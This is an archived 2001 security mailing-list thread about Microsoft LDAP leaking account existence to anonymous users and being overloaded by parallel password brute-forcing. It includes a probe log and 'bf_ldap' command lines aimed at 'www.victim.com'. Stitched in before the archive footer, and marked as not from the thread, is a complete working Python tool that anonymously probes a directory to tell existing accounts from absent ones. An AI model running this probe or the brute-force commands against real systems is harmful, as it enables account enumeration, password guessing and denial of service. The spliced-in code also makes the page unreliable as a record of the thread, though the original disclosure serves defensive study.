Re: implementation problem in Microsoft LDAP?

From: Timothy.Lyonsat_private
Date: Mon Jul 02 2001 - 21:19:56 PDT


    Jeremy,
    
    Having just gone round and round with  Redmond on this one, it is my 
    understanding that Microsoft does not have any means to set Access Control 
    on the RootDSE even if we wanted to.  I believe it's still their position 
    that access to the RootDSE should not be restricted and that the RFC 
    supports this claim.
    
    I vehemently disagree however...
    
    --Tim
    
    "Jeremy Sanders" <jsandersat_private>
    07/02/2001 09:12
    
     
            To:     <Eliel.Sardanonsat_private>, <focus-msat_private>, 
    <vuln-devat_private>
            cc: 
            Subject:        Re: implementation problem in Microsoft LDAP?
    
    
    I would think it would depend on the desired permissions of the anonymous 
    user. Some LDAP directories are intended for anonymous use, but this 
    functionality should be configurable within the directory. I know it is in 
    eDirectory's LDAP implementation. The ideal configuration should allow you 
    to completely disallow anonymous binding if that is the desired 
    configuration.
    
    >>> Sardañons, Eliel <Eliel.Sardanonsat_private> 06/29/01 09:40AM >>>
    Hello, I have been looking at the Microsoft LDAP service error code
    responses, and when I'm not authenticated (anonymous) I can tell whether an
    object exists or not. I would like to know if this is an implementation problem.
    
    Problem 1:
    
    Here we have a log of the saucer program (an LDAP client). As you can see,
    I'm connected to 192.168.0.1:389 (ldap) anonymously. When I make a search
    for a user (or another object) that exists, it returns 'LDAP_SUCCESS'
    but no data in the response (because I'm not logged in). But when I make a
    search trying to find a user or another object that doesn't exist, it
    returns 'No such object'. This can be used by an attacker to gather
    information from the Windows box: for example, if somebody wants to know if
    an account named 'test' exists, he can search for that user object, and if
    it returns LDAP_SUCCESS the user exists, so he can start trying to brute
    force that account.
    
    -------- Saucer LOG --------
    
    /usr/local/ldap/openldap-2.0.4/contrib/saucer# ./saucer -h 192.168.0.1
    
    Bound anonymously to ldap server
    saucer dn=> show CN=Administrator,CN=Users,DC=dev,DC=local
    Results...
    saucer dn=> show CN=Administrators,CN=Users,DC=dev,DC=local 
    Results...
    Error...
    ./saucer: No such object
            matched DN: "CN=Users,DC=dev,DC=local"
            additional info: 0000208D: NameErr: DSID-031001C9, problem 2001
    (NO_OBJECT), data 0, best match of:
            'CN=Users,DC=dev,DC=local'
    
    saucer dn=> 
    
    ----- EOF --------
    
    Problem 2:
    
    Another problem I have seen is that when I use my brute force program
    (brute_force_ldap) to try to guess a Windows password and I run 5 or more
    instances of my program at the same time, like this:
    
    ./bf_ldap -s www.victim.com -d victim.com -u non_existent_user_1 -l 8 &
    ./bf_ldap -s www.victim.com -d victim.com -u non_existent_user_2 -l 8 &
    ./bf_ldap -s www.victim.com -d victim.com -u non_existent_user_3 -l 8 &
    ./bf_ldap -s www.victim.com -d victim.com -u non_existent_user_4 -l 8 &
    ./bf_ldap -s www.victim.com -d victim.com -u non_existent_user_5 -l 8 &
    ./bf_ldap -s www.victim.com -d victim.com -u non_existent_user_6 -l 8 &
    
    the CPU usage on www.victim.com is at 100%!!! And the console is unusable
    on the Windows box. I tried this using a non-existent user and an existing
    user, and it consumes more resources with non-existent users.
    
    So an attacker can use my program as a Distributed Denial of Service
    attack (DDoS), running it from different machines at the same time against
    a single target (www.victim.com).
    
    SOLUTIONS:
        Problem 1: Return 'Object Not Found' if the user has no privileges.
        Problem 2: RST the TCP connection if the user puts in wrong credentials,
                   or introduce a delay in each try.
    
    Eliel C. Sardañons
    eliel.sardanonsat_private 
    Escuela Tecnica Philips Argentina
    
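The existence oracle described in Problem 1 above, reproduced as an added example (this is not code from the thread, from saucer, or from Microsoft). It uses only the Python standard library to send the same anonymous simple bind and a base-scope search for a DN, then classifies the searchResDone result code exactly as the post reports it: resultCode 0 (success) with no entries returned means the object exists but is hidden by ACLs, resultCode 32 (noSuchObject) means it does not exist. The BER tag numbers and message layout follow RFC 4511; the hostname and DNs you pass in are your own inputs, and the `search_result_done` helper exists only to build constructed sample replies for offline checking.

```python
import socket
from typing import Iterator, Tuple

# BER tags per RFC 4511 (LDAPv3)
TAG_BOOLEAN, TAG_INTEGER, TAG_OCTET_STRING = 0x01, 0x02, 0x04
TAG_ENUMERATED, TAG_SEQUENCE = 0x0A, 0x30
APP_BIND_REQUEST, APP_BIND_RESPONSE = 0x60, 0x61        # [APPLICATION 0], [APPLICATION 1]
APP_SEARCH_REQUEST, APP_SEARCH_ENTRY, APP_SEARCH_DONE = 0x63, 0x64, 0x65
CTX_SIMPLE_AUTH = 0x80        # [0] simple password inside BindRequest
CTX_FILTER_PRESENT = 0x87     # [7] "present" filter, i.e. (objectClass=*)
RESULT_SUCCESS, RESULT_NO_SUCH_OBJECT = 0, 32


def ber_len(n: int) -> bytes:
    """Definite length: short form below 128, long form (0x8N + N bytes) above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag: int, content: bytes) -> bytes:
    return bytes([tag]) + ber_len(len(content)) + content


def ber_int(tag: int, value: int) -> bytes:
    """INTEGER/ENUMERATED as minimal two's complement (values used here are small)."""
    return tlv(tag, value.to_bytes(value.bit_length() // 8 + 1, "big", signed=True))


def parse_tlv(buf: bytes, pos: int = 0) -> Tuple[int, bytes, int]:
    """Return (tag, content, next_pos); raise ValueError on a truncated element."""
    tag, first = buf[pos], buf[pos + 1]
    pos, length = pos + 2, first
    if first & 0x80:                                   # long-form length
        nbytes = first & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    if pos + length > len(buf):
        raise ValueError("truncated BER element")
    return tag, buf[pos:pos + length], pos + length


def iter_messages(buf: bytes) -> Iterator[Tuple[int, bytes]]:
    """Yield (protocolOp tag, protocolOp content) for every LDAPMessage in buf."""
    pos = 0
    while pos < len(buf):
        _, msg, pos = parse_tlv(buf, pos)              # LDAPMessage ::= SEQUENCE
        _, _, op_pos = parse_tlv(msg, 0)               # skip messageID
        op_tag, op, _ = parse_tlv(msg, op_pos)
        yield op_tag, op


def ldap_message(message_id: int, op: bytes) -> bytes:
    return tlv(TAG_SEQUENCE, ber_int(TAG_INTEGER, message_id) + op)


def bind_request(message_id: int) -> bytes:
    """Anonymous simple bind: LDAPv3, empty name, empty password."""
    return ldap_message(message_id, tlv(APP_BIND_REQUEST,
        ber_int(TAG_INTEGER, 3) + tlv(TAG_OCTET_STRING, b"") + tlv(CTX_SIMPLE_AUTH, b"")))


def search_request(message_id: int, base_dn: str) -> bytes:
    """Base-scope search for base_dn, filter (objectClass=*), no attributes ("1.1")."""
    op = (tlv(TAG_OCTET_STRING, base_dn.encode())
          + ber_int(TAG_ENUMERATED, 0)                 # scope: baseObject
          + ber_int(TAG_ENUMERATED, 0)                 # derefAliases: neverDerefAliases
          + ber_int(TAG_INTEGER, 0) + ber_int(TAG_INTEGER, 0)   # sizeLimit, timeLimit
          + tlv(TAG_BOOLEAN, b"\x00")                  # typesOnly: FALSE
          + tlv(CTX_FILTER_PRESENT, b"objectClass")
          + tlv(TAG_SEQUENCE, tlv(TAG_OCTET_STRING, b"1.1")))
    return ldap_message(message_id, tlv(APP_SEARCH_REQUEST, op))


def search_result_done(message_id: int, code: int, matched_dn: str = "", diag: str = "") -> bytes:
    """Server-side searchResDone; used here only to build constructed sample replies."""
    return ldap_message(message_id, tlv(APP_SEARCH_DONE,
        ber_int(TAG_ENUMERATED, code) + tlv(TAG_OCTET_STRING, matched_dn.encode())
        + tlv(TAG_OCTET_STRING, diag.encode())))


def classify(responses: bytes) -> str:
    """The oracle from the post: success with zero entries -> exists but hidden by
    ACLs; noSuchObject (32) -> does not exist."""
    entries = 0
    for op_tag, op in iter_messages(responses):
        if op_tag == APP_SEARCH_ENTRY:
            entries += 1
        elif op_tag == APP_SEARCH_DONE:
            code = int.from_bytes(parse_tlv(op, 0)[1], "big", signed=True)
            if code == RESULT_NO_SUCH_OBJECT:
                return "absent"
            if code == RESULT_SUCCESS:
                return "present" if entries else "present-hidden"
            return "error %d" % code
    return "incomplete"


def read_until(sock: socket.socket, done_tag: int) -> bytes:
    """Accumulate bytes until a complete message carrying done_tag has arrived."""
    data = b""
    while True:
        chunk = sock.recv(4096)
        if not chunk:
            return data
        data += chunk
        try:
            if any(tag == done_tag for tag, _ in iter_messages(data)):
                return data
        except (ValueError, IndexError):
            continue                                   # partial message, keep reading


def probe(host: str, dn: str, port: int = 389, timeout: float = 5.0) -> str:
    """Anonymous bind, base search for dn, classify. host/dn are caller-supplied."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(bind_request(1))
        read_until(s, APP_BIND_RESPONSE)
        s.sendall(search_request(2, dn))
        return classify(read_until(s, APP_SEARCH_DONE))


if __name__ == "__main__":
    import sys
    # usage: python ldap_oracle.py <host> "<dn>"   (hypothetical invocation)
    print(sys.argv[2], "->", probe(sys.argv[1], sys.argv[2]))
```

Against a directory that behaves as the post describes, probing `CN=Administrator,CN=Users,DC=dev,DC=local` returns `present-hidden` while a DN that does not exist returns `absent`, which is the whole leak: the client never needs read rights on the entry. The same `classify` function doubles as a regression check for the proposed fix, since a server that returns noSuchObject for entries the binder may not read will answer `absent` in both cases.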



    This archive was generated by hypermail 2b30 : Mon Jul 02 2001 - 22:25:36 PDT